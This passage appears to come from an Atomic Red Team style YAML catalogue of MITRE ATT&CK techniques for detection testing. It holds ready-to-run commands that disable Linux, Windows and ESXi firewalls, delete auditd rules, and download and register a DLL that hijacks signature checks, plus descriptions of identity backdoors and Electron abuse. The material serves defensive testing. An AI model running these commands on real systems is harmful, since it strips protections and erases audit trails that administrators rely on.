'
prereq_command: "if [ ! -x \"$(command -v pfctl)\" ]; then echo -e \"\\n*****
PF NOT installed *****\\n\"; exit 1; fi\nif [ \"$(kldstat -n pf)\" = \"\"
]; then echo -e \"\\n***** PF inactive *****\\n\"; exit 1; fi \n"
get_prereq_command: |
echo "anchor pf-rules >> /etc/pf.conf"
pfctl -f /etc/pf.conf
executor:
name: sh
elevation_required: true
command: |
echo "block in proto tcp from 1.2.3.4 to any" | pfctl -a pf-rules -f -
pfctl -a pf-rules -s rules
cleanup_command: |
pfctl -a pf-rules -F rules
sed -i "" '/anchor pf-rules/d'
pfctl -f /etc/pf.conf
- name: Edit UFW firewall user.rules file
auto_generated_guid: beaf815a-c883-4194-97e9-fdbbb2bbdd7c
description: 'Edit the Uncomplicated Firewall (UFW) rules file /etc/ufw/user.rules.
'
supported_platforms:
- linux
dependency_executor_name: sh
dependencies:
- description: 'Check if /etc/ufw/user.rules exists.
'
prereq_command: 'if [ ! -f "/etc/ufw/user.rules" ]; then echo -e "\n*****
ufw NOT installed *****\n"; exit 1; fi
'
get_prereq_command: 'echo ""
'
executor:
name: sh
elevation_required: true
command: |
echo "# THIS IS A COMMENT" >> /etc/ufw/user.rules
grep "# THIS IS A COMMENT" /etc/ufw/user.rules
cleanup_command: 'sed -i ''s/# THIS IS A COMMENT//g'' /etc/ufw/user.rules
'
- name: Edit UFW firewall ufw.conf file
auto_generated_guid: c1d8c4eb-88da-4927-ae97-c7c25893803b
description: "Edit the Uncomplicated Firewall (UFW) configuration file /etc/ufw/ufw.conf
\nwhich controls if the firewall starts on boot and its logging level.\n"
supported_platforms:
- linux
dependency_executor_name: sh
dependencies:
- description: 'Check if /etc/ufw/ufw.conf exists.
'
prereq_command: 'if [ ! -f "/etc/ufw/ufw.conf" ]; then echo -e "\n***** ufw
NOT installed *****\n"; exit 1; fi
'
get_prereq_command: 'echo ""
'
executor:
name: sh
elevation_required: true
command: |
echo "# THIS IS A COMMENT" >> /etc/ufw/ufw.conf
grep "# THIS IS A COMMENT" /etc/ufw/ufw.conf
cleanup_command: |
sed -i 's/# THIS IS A COMMENT//g' /etc/ufw/ufw.conf
cat /etc/ufw/ufw.conf
- name: Edit UFW firewall sysctl.conf file
auto_generated_guid: c4ae0701-88d3-4cd8-8bce-4801ed9f97e4
description: "Edit the Uncomplicated Firewall (UFW) configuration file for setting
network \nvariables /etc/ufw/sysctl.conf.\n"
supported_platforms:
- linux
dependency_executor_name: sh
dependencies:
- description: 'Check if /etc/ufw/sysctl.conf exists.
'
prereq_command: 'if [ ! -f "/etc/ufw/sysctl.conf" ]; then echo -e "\n*****
ufw NOT installed *****\n"; exit 1; fi
'
get_prereq_command: 'echo ""
'
executor:
name: sh
elevation_required: true
command: |
echo "# THIS IS A COMMENT" >> /etc/ufw/sysctl.conf
grep "# THIS IS A COMMENT" /etc/ufw/sysctl.conf
cleanup_command: |
sed -i 's/# THIS IS A COMMENT//g' /etc/ufw/sysctl.conf
cat /etc/ufw/sysctl.conf
- name: Edit UFW firewall main configuration file
auto_generated_guid: 7b697ece-8270-46b5-bbc7-6b9e27081831
description: "Edit the Uncomplicated Firewall (UFW) main configuration file
for setting \ndefault policies /etc/default/ufw.\n"
supported_platforms:
- linux
dependency_executor_name: sh
dependencies:
- description: 'Check if /etc/default/ufw exists.
'
prereq_command: 'if [ ! -f "/etc/default/ufw" ]; then echo -e "\n***** ufw
NOT installed *****\n"; exit 1; fi
'
get_prereq_command: 'echo ""
'
executor:
name: sh
elevation_required: true
command: |
echo "# THIS IS A COMMENT" >> /etc/default/ufw
grep "# THIS IS A COMMENT" /etc/default/ufw
cleanup_command: 'sed -i ''s/# THIS IS A COMMENT//g'' /etc/default/ufw
'
- name: Tail the UFW firewall log file
auto_generated_guid: 419cca0c-fa52-4572-b0d7-bc7c6f388a27
description: "Print the last 10 lines of the Uncomplicated Firewall (UFW) log
file \n/var/log/ufw.log.\n"
supported_platforms:
- linux
dependency_executor_name: sh
dependencies:
- description: 'Check if /var/log/ufw.log exists.
'
prereq_command: 'if [ ! -f "/var/log/ufw.log" ]; then echo -e "\n***** ufw
NOT logging *****\n"; exit 1; fi
'
get_prereq_command: 'echo ""
'
executor:
name: sh
elevation_required: true
command: 'tail /var/log/ufw.log
'
cleanup_command: ''
- name: Disable iptables
auto_generated_guid: 7784c64e-ed0b-4b65-bf63-c86db229fd56
description: "Some Linux systems may not activate ufw, but use iptables for
firewall rules instead. (ufw works on top of iptables.) \nAttackers cannot
directly disable iptables, as it is not implemented as a service like ufw.
But they can flush all iptables \nrules, which in fact \"disable\" iptables.
\n"
supported_platforms:
- linux
dependency_executor_name: sh
dependencies:
- description: 'Check if iptables is installed on the machine.
'
prereq_command: 'if [ ! -x "$(command -v iptables)" ]; then echo -e "\n*****
iptables NOT installed *****\n"; exit 1; fi
'
get_prereq_command: 'sudo apt-get install iptables
'
executor:
name: sh
elevation_required: true
command: |
iptables-save > /tmp/iptables.rules
iptables -F
cleanup_command: 'iptables-restore < /tmp/iptables.rules
'
- name: Modify/delete iptables firewall rules
auto_generated_guid: 899a7fb5-d197-4951-8614-f19ac4a73ad4
description: "Instead of completely \"disabling\" iptables, adversaries may
choose to delete a certain rule, which, for example, blocks data exfiltration
via ftp.\nBy doing so, they may cause less noise to avoid detection. \n"
supported_platforms:
- linux
dependency_executor_name: sh
dependencies:
- description: 'Check if iptables is installed on the machine.
'
prereq_command: |
if [ ! -x "$(command -v iptables)" ]; then echo -e "\n***** iptables NOT installed *****\n"; exit 1; fi
if ! echo "$(iptables -L)" | grep -q "DROP .*dpt:ftp"; then echo -e "\n***** this firewall rule is NOT activated *****\n***** activate it by executing \"iptables -A OUTPUT -p tcp --dport 21 -j DROP\" *****\n"; exit 1; fi
get_prereq_command: |
iptables-save > /tmp/iptables.rules
if echo "$(iptables -L)" | grep -q "DROP .*dpt:ftp"; then echo "Rule found"; else echo "Rule not found. Setting it..."; iptables -A OUTPUT -p tcp --dport 21 -j DROP; fi
executor:
name: sh
elevation_required: true
command: 'iptables -D OUTPUT -p tcp --dport 21 -j DROP
'
cleanup_command: 'iptables-restore < /tmp/iptables.rules
'
- name: LockBit Black - Unusual Windows firewall registry modification -cmd
auto_generated_guid: a4651931-ebbb-4cde-9363-ddf3d66214cb
description: 'An adversary tries to modify the windows firewall registry
'
supported_platforms:
- windows
executor:
command: |
reg add "HKLM\SOFTWARE\Policies\Microsoft\WindowsFirewall\DomainProfile" /v EnableFirewall /t REG_DWORD /d 0 /f
reg add "HKLM\SOFTWARE\Policies\Microsoft\WindowsFirewall\StandardProfile" /v EnableFirewall /t REG_DWORD /d 0 /f
cleanup_command: |
reg delete "HKLM\SOFTWARE\Policies\Microsoft\WindowsFirewall\DomainProfile" /v EnableFirewall /f >nul 2>&1
reg delete "HKLM\SOFTWARE\Policies\Microsoft\WindowsFirewall\StandardProfile" /v EnableFirewall /f >nul 2>&1
name: command_prompt
elevation_required: true
- name: LockBit Black - Unusual Windows firewall registry modification -Powershell
auto_generated_guid: 80b453d1-eec5-4144-bf08-613a6c3ffe12
description: 'An adversary tries to modify the windows firewall registry.
'
supported_platforms:
- windows
executor:
command: |
New-ItemProperty "HKLM:\SOFTWARE\Policies\Microsoft\WindowsFirewall\DomainProfile" -Name EnableFirewall -PropertyType DWORD -Value 0 -Force
New-ItemProperty "HKLM:\SOFTWARE\Policies\Microsoft\WindowsFirewall\StandardProfile" -Name EnableFirewall -PropertyType DWORD -Value 0 -Force
cleanup_command: |
Remove-ItemProperty "HKLM:\SOFTWARE\Policies\Microsoft\WindowsFirewall\DomainProfile" -Name EnableFirewall -Force -ErrorAction Ignore
Remove-ItemProperty "HKLM:\SOFTWARE\Policies\Microsoft\WindowsFirewall\StandardProfile" -Name EnableFirewall -Force -ErrorAction Ignore
name: powershell
elevation_required: true
- name: Blackbit - Disable Windows Firewall using netsh firewall
auto_generated_guid: 91f348e6-3760-4997-a93b-2ceee7f254ee
description: "An adversary tries to modify the windows firewall configuration
using the deprecated netsh firewall command (command still works). \n"
supported_platforms:
- windows
executor:
command: 'netsh firewall set opmode mode=disable
'
cleanup_command: 'netsh firewall set opmode mode=enable >nul 2>&1
'
name: command_prompt
elevation_required: true
- name: ESXi - Disable Firewall via Esxcli
auto_generated_guid: bac8a340-be64-4491-a0cc-0985cb227f5a
description: 'Adversaries may disable the ESXI firewall via ESXCLI
'
supported_platforms:
- windows
input_arguments:
vm_host:
description: Specify the host name of the ESXi Server
type: string
default: atomic.local
plink_file:
description: Path to Putty
type: path
default: PathToAtomicsFolder\..\ExternalPayloads\plink.exe
username:
description: username used to log into ESXi
type: string
default: root
password:
description: password used to log into ESXI
type: string
default: n/a
dependency_executor_name: powershell
dependencies:
- description: 'The plink executable must be found in the ExternalPayloads folder.
'
prereq_command: 'if (Test-Path "#{plink_file}") {exit 0} else {exit 1}
'
get_prereq_command: |
New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
Invoke-WebRequest "https://the.earth.li/~sgtatham/putty/latest/w64/plink.exe" -OutFile "#{plink_file}"
executor:
command: "#{plink_file} -ssh #{vm_host} -l #{username} -pw #{password} -m
PathToAtomicsFolder\\..\\atomics\\T1562.004\\src\\esxi_disable_firewall.txt\n"
cleanup_command: "#{plink_file} -ssh #{vm_host} -l #{username} -pw #{password}
-m PathToAtomicsFolder\\..\\atomics\\T1562.004\\src\\esxi_enable_firewall.txt\n"
name: command_prompt
elevation_required: false
- name: Set a firewall rule using New-NetFirewallRule
auto_generated_guid: 94be7646-25f6-467e-af23-585fb13000c8
description: This test will attempt to create a new inbound/outbound firewall
rule using the New-NetFirewallRule commandlet.
supported_platforms:
- windows
input_arguments:
direction:
description: Direction can be Inbound or Outbound
type: string
default: Inbound
local_port:
description: This is the local port you wish to test opening
type: integer
default: 21
protocol:
description: This is the protocol
type: string
default: TCP
action:
description: This is the action
type: string
default: allow
executor:
command: New-NetFirewallRule -DisplayName "New rule" -Direction "#{direction}"
-LocalPort "#{local_port}" -Protocol "#{protocol}" -Action "#{action}"
cleanup_command: Remove-NetFirewallRule -DisplayName "New rule"
name: powershell
elevation_required: true
- name: ESXi - Set Firewall to PASS Traffic
auto_generated_guid: a67e8aea-ea7c-4c3b-9b1b-8c2957c3091d
description: 'This test sets the default ESXi firewall action to PASS instead
of DROP. This allows all incoming and outgoing traffic.
'
supported_platforms:
- windows
input_arguments:
vm_host:
description: Specify the host name or IP of the ESXi server.
type: string
default: atomic.local
vm_user:
description: Specify the privilege user account on the ESXi server.
type: string
default: root
vm_pass:
description: Specify the privileged user's password.
type: string
default: password
plink_file:
description: Path to Plink
type: path
default: PathToAtomicsFolder\..\ExternalPayloads\plink.exe
dependency_executor_name: powershell
dependencies:
- description: 'The plink executable must be found in the ExternalPayloads folder.
'
prereq_command: 'if (Test-Path "#{plink_file}") {exit 0} else {exit 1}
'
get_prereq_command: |
New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
Invoke-WebRequest "https://the.earth.li/~sgtatham/putty/latest/w64/plink.exe" -OutFile "#{plink_file}"
executor:
command: 'echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user}
-pw "#{vm_pass}" "esxcli network firewall set --default-action true"
'
cleanup_command: 'echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user}
-pw "#{vm_pass}" "esxcli network firewall set --default-action false"
'
name: command_prompt
elevation_required: false
T1553.003:
technique:
type: attack-pattern
spec_version: '2.1'
id: attack-pattern--543fceb5-cb92-40cb-aacf-6913d4db58bc
created: '2020-02-05T19:34:04.910Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
revoked: false
external_references:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1553/003
external_id: T1553.003
- source_name: Entrust Enable CAPI2 Aug 2017
description: Entrust Datacard. (2017, August 16). How do I enable CAPI 2.0
logging in Windows Vista, Windows 7 and Windows 2008 Server?. Retrieved
January 31, 2018.
url: http://www.entrust.net/knowledge-base/technote.cfm?tn=8165
- source_name: GitHub SIP POC Sept 2017
description: Graeber, M. (2017, September 14). PoCSubjectInterfacePackage.
Retrieved January 31, 2018.
url: https://github.com/mattifestation/PoCSubjectInterfacePackage
- source_name: SpectorOps Subverting Trust Sept 2017
description: Graeber, M. (2017, September). Subverting Trust in Windows. Retrieved
January 31, 2018.
url: https://specterops.io/assets/resources/SpecterOps_Subverting_Trust_in_Windows.pdf
- source_name: Microsoft Catalog Files and Signatures April 2017
description: Hudek, T. (2017, April 20). Catalog Files and Digital Signatures.
Retrieved January 31, 2018.
url: https://docs.microsoft.com/windows-hardware/drivers/install/catalog-files
- source_name: Microsoft Audit Registry July 2012
description: Microsoft. (2012, July 2). Audit Registry. Retrieved January
31, 2018.
url: https://docs.microsoft.com/previous-versions/windows/it-pro/windows-server-2008-R2-and-2008/dd941614(v=ws.10)
- source_name: Microsoft Registry Auditing Aug 2016
description: Microsoft. (2016, August 31). Registry (Global Object Access
Auditing). Retrieved January 31, 2018.
url: https://docs.microsoft.com/previous-versions/windows/it-pro/windows-server-2012-R2-and-2012/dn311461(v=ws.11)
- source_name: Microsoft Authenticode
description: Microsoft. (n.d.). Authenticode. Retrieved January 31, 2018.
url: https://msdn.microsoft.com/library/ms537359.aspx
- source_name: Microsoft WinVerifyTrust
description: Microsoft. (n.d.). WinVerifyTrust function. Retrieved January
31, 2018.
url: https://msdn.microsoft.com/library/windows/desktop/aa388208.aspx
- source_name: EduardosBlog SIPs July 2008
description: Navarro, E. (2008, July 11). SIP’s (Subject Interface Package)
and Authenticode. Retrieved January 31, 2018.
url: https://blogs.technet.microsoft.com/eduardonavarro/2008/07/11/sips-subject-interface-package-and-authenticode/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-10-24T17:48:48.200Z'
name: 'Subvert Trust Controls: SIP and Trust Provider Hijacking'
description: |-
Adversaries may tamper with SIP and trust provider components to mislead the operating system and application control tools when conducting signature validation checks. In user mode, Windows Authenticode (Citation: Microsoft Authenticode) digital signatures are used to verify a file's origin and integrity, variables that may be used to establish trust in signed code (ex: a driver with a valid Microsoft signature may be handled as safe). The signature validation process is handled via the WinVerifyTrust application programming interface (API) function, (Citation: Microsoft WinVerifyTrust) which accepts an inquiry and coordinates with the appropriate trust provider, which is responsible for validating parameters of a signature. (Citation: SpectorOps Subverting Trust Sept 2017)
Because of the varying executable file types and corresponding signature formats, Microsoft created software components called Subject Interface Packages (SIPs) (Citation: EduardosBlog SIPs July 2008) to provide a layer of abstraction between API functions and files. SIPs are responsible for enabling API functions to create, retrieve, calculate, and verify signatures. Unique SIPs exist for most file formats (Executable, PowerShell, Installer, etc., with catalog signing providing a catch-all (Citation: Microsoft Catalog Files and Signatures April 2017)) and are identified by globally unique identifiers (GUIDs). (Citation: SpectorOps Subverting Trust Sept 2017)
Similar to [Code Signing](https://attack.mitre.org/techniques/T1553/002), adversaries may abuse this architecture to subvert trust controls and bypass security policies that allow only legitimately signed code to execute on a system. Adversaries may hijack SIP and trust provider components to mislead operating system and application control tools to classify malicious (or any) code as signed by: (Citation: SpectorOps Subverting Trust Sept 2017)
* Modifying the Dll and FuncName Registry values in HKLM\SOFTWARE[\WOW6432Node\]Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllGetSignedDataMsg\{SIP_GUID} that point to the dynamic link library (DLL) providing a SIP’s CryptSIPDllGetSignedDataMsg function, which retrieves an encoded digital certificate from a signed file. By pointing to a maliciously-crafted DLL with an exported function that always returns a known good signature value (ex: a Microsoft signature for Portable Executables) rather than the file’s real signature, an adversary can apply an acceptable signature value to all files using that SIP (Citation: GitHub SIP POC Sept 2017) (although a hash mismatch will likely occur, invalidating the signature, since the hash returned by the function will not match the value computed from the file).
* Modifying the Dll and FuncName Registry values in HKLM\SOFTWARE\[WOW6432Node\]Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllVerifyIndirectData\{SIP_GUID} that point to the DLL providing a SIP’s CryptSIPDllVerifyIndirectData function, which validates a file’s computed hash against the signed hash value. By pointing to a maliciously-crafted DLL with an exported function that always returns TRUE (indicating that the validation was successful), an adversary can successfully validate any file (with a legitimate signature) using that SIP (Citation: GitHub SIP POC Sept 2017) (with or without hijacking the previously mentioned CryptSIPDllGetSignedDataMsg function). This Registry value could also be redirected to a suitable exported function from an already present DLL, avoiding the requirement to drop and execute a new file on disk.
* Modifying the DLL and Function Registry values in HKLM\SOFTWARE\[WOW6432Node\]Microsoft\Cryptography\Providers\Trust\FinalPolicy\{trust provider GUID} that point to the DLL providing a trust provider’s FinalPolicy function, which is where the decoded and parsed signature is checked and the majority of trust decisions are made. Similar to hijacking SIP’s CryptSIPDllVerifyIndirectData function, this value can be redirected to a suitable exported function from an already present DLL or a maliciously-crafted DLL (though the implementation of a trust provider is complex).
* **Note:** The above hijacks are also possible without modifying the Registry via [DLL](https://attack.mitre.org/techniques/T1574/001) search order hijacking.
Hijacking SIP or trust provider components can also enable persistent code execution, since these malicious components may be invoked by any application that performs code signing or signature validation. (Citation: SpectorOps Subverting Trust Sept 2017)
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: defense-evasion
x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- Matt Graeber, @mattifestation, SpecterOps
x_mitre_deprecated: false
x_mitre_detection: ''
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
x_mitre_version: '1.1'
identifier: T1553.003
atomic_tests:
- name: SIP (Subject Interface Package) Hijacking via Custom DLL
auto_generated_guid: e12f5d8d-574a-4e9d-8a84-c0e8b4a8a675
description: "Registers a DLL that logs signature checks, mimicking SIP hijacking.
This test uses a DLL from \nhttps://github.com/gtworek/PSBits/tree/master/SIP
and registers it using regsvr32, thereby causing\nthe system to utilize it
during signature checks, and logging said checks.\n"
supported_platforms:
- windows
input_arguments:
dll_payload:
description: Path to GTSIPProvider.dll
type: path
default: PathToAtomicsFolder\T1553.003\bin\GTSIPProvider.dll
dependency_executor_name: powershell
dependencies:
- description: 'GTSIPProvider.dll must exist on disk at specified location (#{dll_payload})
'
prereq_command: 'if (Test-Path "#{dll_payload}") {exit 0} else {exit 1}
'
get_prereq_command: |
New-Item -Type Directory (split-path "#{dll_payload}") -ErrorAction ignore | Out-Null
Invoke-WebRequest "https://github.com/gtworek/PSBits/raw/2aa885c7d09f7f100997bfa5ee0c404084177f24/SIP/GTSIPProvider.dll" -OutFile "#{dll_payload}"
executor:
command: 'regsvr32.exe #{dll_payload}
'
cleanup_command: 'regsvr32.exe /u #{dll_payload}
'
name: command_prompt
elevation_required: true
T1556.007:
technique:
type: attack-pattern
spec_version: '2.1'
id: attack-pattern--54ca26f3-c172-4231-93e5-ccebcac2161f
created: '2022-09-28T13:29:53.354Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
revoked: false
external_references:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1556/007
external_id: T1556.007
- source_name: Azure AD Connect for Read Teamers
description: Adam Chester. (2019, February 18). Azure AD Connect for Red Teamers.
Retrieved September 28, 2022.
url: https://blog.xpnsec.com/azuread-connect-for-redteam/
- source_name: AADInternals Azure AD On-Prem to Cloud
description: 'Dr. Nestori Syynimaa. (2020, July 13). Unnoticed sidekick: Getting
access to cloud as an on-prem admin. Retrieved September 28, 2022.'
url: https://o365blog.com/post/on-prem_admin/
- source_name: MagicWeb
description: 'Microsoft Threat Intelligence Center, Microsoft Detection and
Response Team, Microsoft 365 Defender Research Team . (2022, August 24).
MagicWeb: NOBELIUM’s post-compromise trick to authenticate as anyone. Retrieved
September 28, 2022.'
url: https://www.microsoft.com/security/blog/2022/08/24/magicweb-nobeliums-post-compromise-trick-to-authenticate-as-anyone/
- source_name: Azure AD Hybrid Identity
description: Microsoft. (2022, August 26). Choose the right authentication
method for your Azure Active Directory hybrid identity solution. Retrieved
September 28, 2022.
url: https://learn.microsoft.com/en-us/azure/active-directory/hybrid/choose-ad-authn
- source_name: Mandiant Azure AD Backdoors
description: Mike Burns. (2020, September 30). Detecting Microsoft 365 and
Azure Active Directory Backdoors. Retrieved September 28, 2022.
url: https://www.mandiant.com/resources/detecting-microsoft-365-azure-active-directory-backdoors
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-04-15T22:40:10.913Z'
name: Hybrid Identity
description: "Adversaries may patch, modify, or otherwise backdoor cloud authentication
processes that are tied to on-premises user identities in order to bypass
typical authentication mechanisms, access credentials, and enable persistent
access to accounts. \n\nMany organizations maintain hybrid user and device
identities that are shared between on-premises and cloud-based environments.
These can be maintained in a number of ways. For example, Microsoft Entra
ID includes three options for synchronizing identities between Active Directory
and Entra ID(Citation: Azure AD Hybrid Identity):\n\n* Password Hash Synchronization
(PHS), in which a privileged on-premises account synchronizes user password
hashes between Active Directory and Entra ID, allowing authentication to Entra
ID to take place entirely in the cloud \n* Pass Through Authentication (PTA),
in which Entra ID authentication attempts are forwarded to an on-premises
PTA agent, which validates the credentials against Active Directory \n* Active
Directory Federation Services (AD FS), in which a trust relationship is established
between Active Directory and Entra ID \n\nAD FS can also be used with other
SaaS and cloud platforms such as AWS and GCP, which will hand off the authentication
process to AD FS and receive a token containing the hybrid users’ identity
and privileges. \n\nBy modifying authentication processes tied to hybrid identities,
an adversary may be able to establish persistent privileged access to cloud
resources. For example, adversaries who compromise an on-premises server running
a PTA agent may inject a malicious DLL into the `AzureADConnectAuthenticationAgentService`
process that authorizes all attempts to authenticate to Entra ID, as well
as records user credentials.(Citation: Azure AD Connect for Read Teamers)(Citation:
AADInternals Azure AD On-Prem to Cloud) In environments using AD FS, an adversary
may edit the `Microsoft.IdentityServer.Servicehost` configuration file to
load a malicious DLL that generates authentication tokens for any user with
any set of claims, thereby bypassing multi-factor authentication and defined
AD FS policies.(Citation: MagicWeb)\n\nIn some cases, adversaries may be able
to modify the hybrid identity authentication process from the cloud. For example,
adversaries who compromise a Global Administrator account in an Entra ID tenant
may be able to register a new PTA agent via the web console, similarly allowing
them to harvest credentials and log into the Entra ID environment as any user.(Citation:
Mandiant Azure AD Backdoors)"
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: credential-access
- kill_chain_name: mitre-attack
phase_name: defense-evasion
- kill_chain_name: mitre-attack
phase_name: persistence
x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- Praetorian
x_mitre_deprecated: false
x_mitre_detection: ''
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
- SaaS
- IaaS
- Office Suite
- Identity Provider
x_mitre_version: '1.1'
atomic_tests: []
T1218.015:
technique:
type: attack-pattern
spec_version: '2.1'
id: attack-pattern--561ae9aa-c28a-4144-9eec-e7027a14c8c3
created: '2024-03-07T19:32:35.383Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
revoked: false
external_references:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1218/015
external_id: T1218.015
- source_name: Electron 3
description: Alanna Titterington. (2023, September 14). Security of Electron-based
desktop applications. Retrieved March 7, 2024.
url: https://www.kaspersky.com/blog/electron-framework-security-issues/49035/
- source_name: Electron Security
description: ElectronJS.org. (n.d.). Retrieved March 7, 2024.
url: https://www.electronjs.org/docs/latest/tutorial/using-native-node-modules
- source_name: Electron 6-8
description: Kosayev, U. (2023, June 15). One Electron to Rule Them All. Retrieved
March 7, 2024.
url: https://medium.com/@MalFuzzer/one-electron-to-rule-them-all-dc2e9b263daf
- source_name: Electron 1
description: TOM ABAI. (2023, August 10). There’s a New Stealer Variant in
Town, and It’s Using Electron to Stay Fully Undetected. Retrieved March
7, 2024.
url: https://www.mend.io/blog/theres-a-new-stealer-variant-in-town-and-its-using-electron-to-stay-fully-undetected/
- source_name: Electron 2
description: Trend Micro. (2023, June 6). Abusing Electronbased applications
in targeted attacks. Retrieved March 7, 2024.
url: https://www.first.org/resources/papers/conf2023/FIRSTCON23-TLP-CLEAR-Horejsi-Abusing-Electron-Based-Applications-in-Targeted-Attacks.pdf
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-04-15T22:24:54.174Z'
name: Electron Applications
description: |-
Adversaries may abuse components of the Electron framework to execute malicious code. The Electron framework hosts many common applications such as Signal, Slack, and Microsoft Teams.(Citation: Electron 2) Originally developed by GitHub, Electron is a cross-platform desktop application development framework that employs web technologies like JavaScript, HTML, and CSS.(Citation: Electron 3) The Chromium engine is used to display web content and Node.js runs the backend code.(Citation: Electron 1)
Due to the functional mechanics of Electron (such as allowing apps to run arbitrary commands), adversaries may also be able to perform malicious functions in the background potentially disguised as legitimate tools within the framework.(Citation: Electron 1) For example, the abuse of `teams.exe` and `chrome.exe` may allow adversaries to execute malicious commands as child processes of the legitimate application (e.g., `chrome.exe --disable-gpu-sandbox --gpu-launcher="C:\Windows\system32\cmd.exe /c calc.exe`).(Citation: Electron 6-8)
Adversaries may also execute malicious content by planting malicious [JavaScript](https://attack.mitre.org/techniques/T1059/007) within Electron applications.(Citation: Electron Security)
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: defense-evasion
x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- Debabrata Sharma
x_mitre_deprecated: false
x_mitre_detection: ''
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Linux
- macOS
- Windows
x_mitre_version: '1.0'
atomic_tests: []
T1562.012:
technique:
type: attack-pattern
spec_version: '2.1'
id: attack-pattern--562e9b64-7239-493d-80f4-2bff900d9054
created: '2023-05-24T19:03:03.855Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
revoked: false
external_references:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1562/012
external_id: T1562.012
- source_name: IzyKnows auditd threat detection 2022
description: IzySec. (2022, January 26). Linux auditd for Threat Detection.
Retrieved September 29, 2023.
url: https://izyknows.medium.com/linux-auditd-for-threat-detection-d06c8b941505
- source_name: Red Hat System Auditing
description: Jahoda, M. et al.. (2017, March 14). Red Hat Security Guide
- Chapter 7 - System Auditing. Retrieved December 20, 2017.
url: https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/6/html/security_guide/chap-system_auditing
- source_name: ESET Ebury Feb 2014
description: M.Léveillé, M.. (2014, February 21). An In-depth Analysis of
Linux/Ebury. Retrieved April 19, 2019.
url: https://www.welivesecurity.com/2014/02/21/an-in-depth-analysis-of-linuxebury/
- source_name: Trustwave Honeypot SkidMap 2023
description: 'Radoslaw Zdonczyk. (2023, July 30). Honeypot Recon: New Variant
of SkidMap Targeting Redis. Retrieved September 29, 2023.'
url: https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/honeypot-recon-new-variant-of-skidmap-targeting-redis/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-04-15T22:20:10.121Z'
name: 'Impair Defenses: Disable or Modify Linux Audit System'
description: |-
Adversaries may disable or modify the Linux audit system to hide malicious activity and avoid detection. Linux admins use the Linux Audit system to track security-relevant information on a system. The Linux Audit system operates at the kernel-level and maintains event logs on application and system activity such as process, network, file, and login events based on pre-configured rules.
Often referred to as `auditd`, this is the name of the daemon used to write events to disk and is governed by the parameters set in the `audit.conf` configuration file. Two primary ways to configure the log generation rules are through the command line `auditctl` utility and the file `/etc/audit/audit.rules`, containing a sequence of `auditctl` commands loaded at boot time.(Citation: Red Hat System Auditing)(Citation: IzyKnows auditd threat detection 2022)
With root privileges, adversaries may be able to ensure their activity is not logged through disabling the Audit system service, editing the configuration/rule files, or by hooking the Audit system library functions. Using the command line, adversaries can disable the Audit system service through killing processes associated with `auditd` daemon or use `systemctl` to stop the Audit service. Adversaries can also hook Audit system functions to disable logging or modify the rules contained in the `/etc/audit/audit.rules` or `audit.conf` files to ignore malicious activity.(Citation: Trustwave Honeypot SkidMap 2023)(Citation: ESET Ebury Feb 2014)
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: defense-evasion
x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- Tim (Wadhwa-)Brown
x_mitre_deprecated: false
x_mitre_detection: ''
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Linux
x_mitre_version: '1.0'
identifier: T1562.012
atomic_tests:
- name: Delete all auditd rules using auditctl
auto_generated_guid: 33a29ab1-cabb-407f-9448-269041bf2856
description: 'Using ''auditctl -D'' deletes all existing audit rules, resulting
in the loss of previously configured monitoring settings and the audit trail.
This action reduces visibility into system activities, potentially leading
to compliance concerns and hampering security monitoring efforts. Additionally,
it poses a risk of covering unauthorized activities by erasing evidence from
audit logs.
'
supported_platforms:
- linux
dependency_executor_name: sh
dependencies:
- description: 'Check if auditd is installed.
'
prereq_command: 'if [ $(command -v auditctl) ]; then exit 0; else exit 1;
fi
'
get_prereq_command: "(yum install auditd -y) || (apt-get install auditd -y)
|| (dnf install auditd -y)\n"
executor:
command: 'auditctl -D
'
name: sh
elevation_required: true
cleanup_command: 'service auditd restart
'
- name: Disable auditd using auditctl
